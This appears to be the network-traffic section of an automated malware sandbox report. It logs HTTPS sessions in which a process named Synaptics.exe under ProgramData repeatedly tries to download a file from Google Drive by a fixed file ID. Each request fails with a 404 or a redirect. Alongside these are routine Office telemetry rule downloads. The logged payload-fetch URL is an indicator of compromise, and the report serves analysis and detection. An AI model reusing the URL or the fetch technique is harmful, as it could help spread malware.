                                                                                        2024-12-05 21:50:16 UTC1605INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 35 31 30 6f 33 42 4d 38 46 43 41 54 72 5f 31 55 6a 34 52 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0510o3BM8FCATr_1Uj4R6g">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-05 21:50:16 UTC47INData Raw: 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.549731142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:15 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-05 21:50:16 UTC1604INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0pyv0B0qf1NCaECKx8ecZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC4R75m7PVLwYG-drg1AeK_8FEc8_N4V2JlFNxbS-t5kcr2QPBkCOaHP8k5zEGGMvMHuBmrgmm4hYg
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k; expires=Fri, 06-Jun-2025 21:50:16 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:16 UTC1604INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 61 32 52 70 74 4a 48 46 63 6b 4d 5f 48 2d 76 33 47 79 34 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ga2RptJHFckM_H-v3Gy4Ig">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-05 21:50:16 UTC48INData Raw: 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        8192.168.2.54974513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:18 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:19 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:18 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 218853
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public
                                                                                        Last-Modified: Wed, 04 Dec 2024 18:36:58 GMT
                                                                                        ETag: "0x8DD1492A2AADD99"
                                                                                        x-ms-request-id: 88403f12-001e-00a2-039f-46d4d5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215018Z-1746fd949bd2cq7chC1EWRnx9g00000002tg00000000znsv
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:19 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.549747172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:20 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:20 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-crWepSjD4bu8uwJm3sUSIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.549746172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:20 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:20 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WQyUWUjpkM9ac27toHh85Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        11192.168.2.54975013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:21 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2980
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bddgsvjhC1EWRum2c00000003eg00000000wn54
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
